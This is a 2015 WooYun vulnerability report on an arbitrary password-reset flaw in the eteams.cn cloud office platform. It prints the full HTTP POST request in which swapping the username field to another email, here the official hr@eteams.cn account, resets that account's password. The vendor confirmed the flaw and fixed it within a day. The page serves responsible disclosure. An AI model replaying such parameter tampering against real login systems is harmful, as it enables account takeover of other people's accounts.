当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128603

漏洞标题:泛微旗下云办公平台任意密码重置漏洞(官方帐号为例)

相关厂商:eteams.cn

漏洞作者: 路人甲

提交时间:2015-07-23 18:41

修复时间:2015-07-24 09:17

公开时间:2015-07-24 09:17

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-23: 细节已通知厂商并且等待厂商处理中
2015-07-23: 厂商已经确认,细节仅向厂商公开
2015-07-24: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

RT

详细说明:

https://passport.eteams.cn/password

泛微0.png


重置密码功能,通过邮箱验证后,修改密码时
把username修改为任意邮箱即可被重置
以官网帐号hr@eteams.cn为例

POST /password/changePassword/emailway HTTP/1.1
Host: passport.eteams.cn
Connection: keep-alive
Content-Length: 124
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://passport.eteams.cn
User-Agent:  
Content-Type: application/x-www-form-urlencoded
Referer: https://passport.eteams.cn/password/reset?key=YWtsZm9lb0AxNjMuY29tJkhyTWREMGo5a3ExVUw3cH00BGMnIrRHFlYmRvdGdJMFh1Y0NtcHJGeGFPYkdqcmRqU291STVqeVJ0TWc5SnU2ZWo
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=B721F50AF929763B14A4B8**D668D415; Hm_lvt_41555f1291b274a5e1d99199f20e9eab=1437620046,1437620193; Hm_lpvt_41555f1291b274a5e1d99199f20e9eab=1437620256
newPwd=888888&confirmPwd=888888&username=hr@eteams.cn&pwd=HrMdD0j9kq1UL7ppF2r%2BDqebdotgI0XucCmprFxaObGjrdjSouI5jyRtMg9Ju6ej

漏洞证明:

泛微1.png

泛微2.png

泛微3.png

泛微4.png

修复方案:

判断

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-07-23 19:14

厂商回复:

在程序控制疏忽遗漏了,感谢

最新状态:

2015-07-24:已修复